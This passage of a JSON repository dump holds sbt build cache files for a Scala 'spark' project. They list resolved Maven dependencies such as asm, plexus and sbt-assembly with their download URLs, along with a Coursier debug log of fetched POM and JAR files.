tion\":\"javax.inject\",\"name\":\"javax.inject\",\"revision\":\"1\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"javax.inject\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/inject/javax.inject/1/javax.inject-1.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://code.google.com/p/atinject/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"javax.annotation\",\"name\":\"jsr250-api\",\"revision\":\"1.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jsr250-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/annotation/jsr250-api/1.0/jsr250-api-1.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://jcp.org/aboutJava/communityprocess/final/jsr250/index.html\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-analysis\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-analysis\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-analysis/7.0/asm-analysis-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"javax.enterprise\",\"name\":\"cdi-api\",\"revision\":\"1.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[{\"organization\":\"javax.el\",\"name\":\"el-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.ejb3\",\"name\":\"jboss-ejb3-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}},{\"organization\":\"org.jboss.interceptor\",\"name\":\"jboss-interceptor-api\",\"artifact\":\"*\",\"configurations\":[],\"crossVersion\":{\"type\":\"Disabled\"}}],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"cdi-api\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/javax/enterprise/cdi-api/1.0/cdi-api-1.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.commons\",\"name\":\"commons-lang3\",\"revision\":\"3.4\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"commons-lang3\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/commons/commons-lang3/3.4/commons-lang3-3.4.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://commons.apache.org/proper/commons-lang/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.maven\",\"name\":\"maven-model\",\"revision\":\"3.3.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"maven-model\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/maven/maven-model/3.3.9/maven-model-3.3.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-commons\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-commons\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-commons/7.0/asm-commons-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.apache.ant\",\"name\":\"ant-launcher\",\"revision\":\"1.9.9\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"ant-launcher\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/apache/ant/ant-launcher/1.9.9/ant-launcher-1.9.9.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://ant.apache.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-reflect\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-reflect\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-reflect.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm-tree\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm-tree\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm-tree/7.0/asm-tree-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.eclipse.sisu\",\"name\":\"org.eclipse.sisu.inject\",\"revision\":\"0.3.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"org.eclipse.sisu.inject\",\"type\":\"eclipse-plugin\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.inject/0.3.2/org.eclipse.sisu.inject-0.3.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.eclipse.sisu\",\"name\":\"org.eclipse.sisu.plexus\",\"revision\":\"0.3.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"org.eclipse.sisu.plexus\",\"type\":\"eclipse-plugin\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/eclipse/sisu/org.eclipse.sisu.plexus/0.3.2/org.eclipse.sisu.plexus-0.3.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.pantsbuild\",\"name\":\"jarjar\",\"revision\":\"1.7.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"jarjar\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/pantsbuild/jarjar/1.7.2/jarjar-1.7.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://github.com/pantsbuild/jarjar\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-component-annotations\",\"revision\":\"1.5.5\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-component-annotations\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.5/plexus-component-annotations-1.5.5.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-classworlds\",\"revision\":\"2.5.2\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-classworlds\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-classworlds/2.5.2/plexus-classworlds-2.5.2.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.ow2.asm\",\"name\":\"asm\",\"revision\":\"7.0\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"asm\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/ow2/asm/asm/7.0/asm-7.0.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://asm.ow2.org/\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.scalactic\",\"name\":\"scalactic_2.12\",\"revision\":\"3.0.8\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scalactic_2.12\",\"type\":\"bundle\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/scalactic/scalactic_2.12/3.0.8/scalactic_2.12-3.0.8.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://www.scalatest.org\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"org.codehaus.plexus\",\"name\":\"plexus-utils\",\"revision\":\"3.0.22\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"plexus-utils\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar\",\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo1.maven.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"http://plexus.codehaus.org/plexus-utils\",\"extraAttributes\":{},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]},{\"module\":{\"organization\":\"com.eed3si9n\",\"name\":\"sbt-assembly\",\"revision\":\"0.14.10\",\"configurations\":\"compile\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"sbt-assembly\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"url\":\"https://repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar\",\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"allowInsecureProtocol\":false},\"file:///Users/xander/Library/Caches/Coursier/v1/https/repo.scala-sbt.org/scalasbt/sbt-plugin-releases/com.eed3si9n/sbt-assembly/scala_2.12/sbt_1.0/0.14.10/jars/sbt-assembly.jar\"]],\"missingArtifacts\":[],\"publicationDate\":\"2019-08-06T10:52:23+08:00\",\"evicted\":false,\"extraAttributes\":{\"sbtVersion\":\"1.0\",\"scalaVersion\":\"2.12\"},\"configurations\":[{\"name\":\"pom\"},{\"name\":\"test\"},{\"name\":\"provided\"},{\"name\":\"docs\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"sources\"},{\"name\":\"runtime\"}],\"licenses\":[[\"MIT License\",\"https://github.com/sbt/sbt-assembly/blob/master/LICENSE\"]],\"callers\":[]},{\"module\":{\"organization\":\"org.scala-lang\",\"name\":\"scala-library\",\"revision\":\"2.12.10\",\"configurations\":\"default\",\"isChanging\":false,\"isTransitive\":true,\"isForce\":false,\"explicitArtifacts\":[],\"inclusions\":[],\"exclusions\":[],\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"crossVersion\":{\"type\":\"Disabled\"}},\"artifacts\":[[{\"name\":\"scala-library\",\"type\":\"jar\",\"extension\":\"jar\",\"configurations\":[],\"extraAttributes\":{},\"allowInsecureProtocol\":false},\"file:///Users/xander/.sbt/boot/scala-2.12.10/lib/scala-library.jar\"]],\"missingArtifacts\":[],\"evicted\":false,\"homepage\":\"https://www.scala-lang.org/\",\"extraAttributes\":{\"info.apiURL\":\"https://www.scala-lang.org/api/2.12.10/\"},\"configurations\":[{\"name\":\"test\"},{\"name\":\"optional\"},{\"name\":\"compile\"},{\"name\":\"default\"},{\"name\":\"runtime\"}],\"licenses\":[],\"callers\":[]}],\"details\":[]}],\"stats\":{\"resolveTime\":-1,\"downloadTime\":-1,\"downloadSize\":-1,\"cached\":true},\"stamps\":{}}"
  },
  {
    "path": "spark/project/target/streams/_global/_global/_global/streams/out",
    "content": ""
  },
  {
    "path": "spark/project/target/streams/_global/_global/csrLogger/_global/streams/out",
    "content": "\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo1.maven.org/maven2/org/jetbrains/sbt-idea-shell_2.12_1.0/2018.3/sbt-idea-shell-2018.3.pom\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo1.maven.org/maven2/org/jetbrains/sbt-structure-extractor_2.12_1.0/2018.2.1+4-88400d3f/sbt-structure-extractor-2018.2.1+4-88400d3f.pom\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo1.maven.org/maven2/org/jetbrains/sbt-idea-compiler-indices_2.12_1.0/0.1.3/sbt-idea-compiler-indices-0.1.3.pom\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo1.maven.org/maven2/org/jetbrains/sbt-idea-shell_2.12_1.0/2018.3/sbt-idea-shell-2018.3.pom.sha1\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo1.maven.org/maven2/org/jetbrains/sbt-idea-compiler-indices_2.12_1.0/0.1.3/sbt-idea-compiler-indices-0.1.3.pom.sha1\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo1.maven.org/maven2/org/jetbrains/sbt-structure-extractor_2.12_1.0/2018.2.1+4-88400d3f/sbt-structure-extractor-2018.2.1+4-88400d3f.pom.sha1\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo.scala-sbt.org/scalasbt/sbt-plugin-releases/org.jetbrains/sbt-idea-shell/scala_2.12/sbt_1.0/2018.3/ivys/ivy.xml\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo.scala-sbt.org/scalasbt/sbt-plugin-releases/org.jetbrains/sbt-idea-compiler-indices/scala_2.12/sbt_1.0/0.1.3/ivys/ivy.xml\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo.scala-sbt.org/scalasbt/sbt-plugin-releases/org.jetbrains/sbt-structure-extractor/scala_2.12/sbt_1.0/2018.2.1+4-88400d3f/ivys/ivy.xml\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo1.maven.org/maven2/io/github/sugakandrey/scala-compiler-indices-protocol_2.12/0.1.1/scala-compiler-indices-protocol_2.12-0.1.1.pom\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo1.maven.org/maven2/io/spray/spray-json_2.12/1.3.4/spray-json_2.12-1.3.4.pom\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo.scala-sbt.org/scalasbt/sbt-plugin-releases/org.jetbrains/sbt-idea-shell/scala_2.12/sbt_1.0/2018.3/srcs/sbt-idea-shell-sources.jar\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo1.maven.org/maven2/io/github/sugakandrey/scala-compiler-indices-protocol_2.12/0.1.1/scala-compiler-indices-protocol_2.12-0.1.1.jar\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo.scala-sbt.org/scalasbt/sbt-plugin-releases/org.jetbrains/sbt-idea-compiler-indices/scala_2.12/sbt_1.0/0.1.3/jars/sbt-idea-compiler-indices.jar\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo1.maven.org/maven2/io/spray/spray-json_2.12/1.3.4/spray-json_2.12-1.3.4.jar\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo.scala-sbt.org/scalasbt/sbt-plugin-releases/org.jetbrains/sbt-idea-compiler-indices/scala_2.12/sbt_1.0/0.1.3/srcs/sbt-idea-compiler-indices-sources.jar\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo.scala-sbt.org/scalasbt/sbt-plugin-releases/org.jetbrains/sbt-idea-shell/scala_2.12/sbt_1.0/2018.3/jars/sbt-idea-shell.jar\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo.scala-sbt.org/scalasbt/sbt-plugin-releases/org.jetbrains/sbt-idea-shell/scala_2.12/sbt_1.0/2018.3/docs/sbt-idea-shell-javadoc.jar\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo.scala-sbt.org/scalasbt/sbt-plugin-releases/org.jetbrains/sbt-structure-extractor/scala_2.12/sbt_1.0/2018.2.1+4-88400d3f/jars/sbt-structure-extractor.jar\u001b[0m\n\u001b[0m[\u001b[0m\u001b[0mdebug\u001b[0m] \u001b[0m\u001b[0mdownloaded https://repo.scala-sbt.org/scalasbt/sbt-plugin-releases/org.jetbrains/sbt-idea-compiler-indices/scala_2.12/sbt_1.0/0.1.3/docs/sbt-idea-compiler-indices-javadoc.jar\u001b[0m\n"
  },
  {
    "path": "spark/project/target/streams/_global/csrConfiguration/_global/streams/out",
    "content": ""
  },
  {
    "path": "spark/project/target/streams/_global/csrProject/_global/streams/out",
    "content": ""
  },
  {
    "path": "spark/project/target/streams/_global/dependencyPositions/_global/streams/update_cache_2.12/input_dsp",
    "content": "1495877195"
  },
  {
    "path": "spark/project/target/streams/_global/dependencyPositions/_global/streams/update_cache_2.12/output_dsp",
